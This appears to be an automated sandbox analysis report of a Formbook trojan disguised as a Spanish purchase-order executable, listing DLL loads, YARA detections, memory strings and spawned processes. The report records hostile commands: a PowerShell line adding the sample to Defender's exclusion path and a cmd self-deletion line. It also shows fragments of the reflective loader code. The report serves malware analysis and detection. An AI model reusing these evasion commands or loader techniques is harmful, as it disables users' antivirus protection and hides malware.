Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3796185468.000000000869F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Solicitud de pedido Documento No 168646080.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Solicitud de pedido Documento No 168646080.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msiexec.exe PID: 7484, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, whpP5TtEouWaYsEmMt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: _0020.SetAccessControl
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: _0020.AddAccessRule
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: _0020.SetAccessControl
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, kbyZoOFYGol61nA9yq.cs	Security API names: _0020.AddAccessRule
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, whpP5TtEouWaYsEmMt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/6@10/9

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Solicitud de pedido Documento No 168646080.exe.log

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khqrro1x.yhm.ps1

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Solicitud de pedido Documento No 168646080.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * from [GroceryMSdb].[dbo].[ProductList] order by ProdId asc;
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select ProdId, ProdName, ProdPrice, ProdQty, ProdCat from [GroceryMSdb].[dbo].[ProductList] order by ProdId asc;?select * from SelectedProducts;5Select a product to remove
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT TOP (1) [ProdId] FROM [GroceryMSdb].[dbo].[ProductList] order by ProdId desc;
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select ProdId, ProdName, ProdPrice, ProdQty, ProdCat from [GroceryMSdb].[dbo].[ProductList] order by ProdId asc;:DELETE FROM SelectedProducts;>select * from SelectedProducts;
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * FROM [GroceryMSdb].[dbo].[User] where Role = 'Employee';
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select Id from [GroceryMSdb].[dbo].[User] where Role='Employee';
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select ProdId, ProdName, ProdQty from [GroceryMSdb].[dbo].[ProductList] order by ProdQty asc;gselect ProdId from ProductList order by ProdId asc;cselect CusId from [GroceryMSdb].[dbo].[Customer];aselect OrderId from [GroceryMSdb].[dbo].[Order];gselect TotalPrice from [GroceryMSdb].[dbo].[Order];kselect ProdCat from ProductList order by ProdCat asc;
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT TOP (1) [Id] FROM [GroceryMSdb].[dbo].[User] order by Id desc;
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT TOP (1) [OrderId] FROM [GroceryMSdb].[dbo].[Order] order by OrderId desc;

Source: Solicitud de pedido Documento No 168646080.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process created: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains method to dynamically call methods (often used by packers)

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msiexec.pdb source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450776254.0000000001590000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3782071356.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450776254.0000000001590000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000008.00000002.3782071356.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: qEnw.pdbSHA256 source: Solicitud de pedido Documento No 168646080.exe
Source:	Binary string: wntdll.pdbUGP source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450866073.0000000001630000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1452347994.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1450689990.0000000004932000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Solicitud de pedido Documento No 168646080.exe, Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450866073.0000000001630000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000008.00000002.3787118539.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3787118539.0000000004E2E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1452347994.0000000004AE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1450689990.0000000004932000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: qEnw.pdb source: Solicitud de pedido Documento No 168646080.exe

Data Obfuscation

Source: Solicitud de pedido Documento No 168646080.exe, EmployeeDash.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{SSA[0],SSA[1],"GMS"}}, (string[])null, (bool[])null)
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 7.2.explorer.exe.1043f840.0.raw.unpack, EmployeeDash.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{SSA[0],SSA[1],"GMS"}}, (string[])null, (bool[])null)
Source: 8.2.msiexec.exe.521f840.3.raw.unpack, EmployeeDash.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{SSA[0],SSA[1],"GMS"}}, (string[])null, (bool[])null)

.NET source code contains potential unpacker

Source: Solicitud de pedido Documento No 168646080.exe, EmployeeDash.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: Solicitud de pedido Documento No 168646080.exe, EmployeeDash.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, kbyZoOFYGol61nA9yq.cs	.Net Code: vnLm7js8uM System.Reflection.Assembly.Load(byte[])
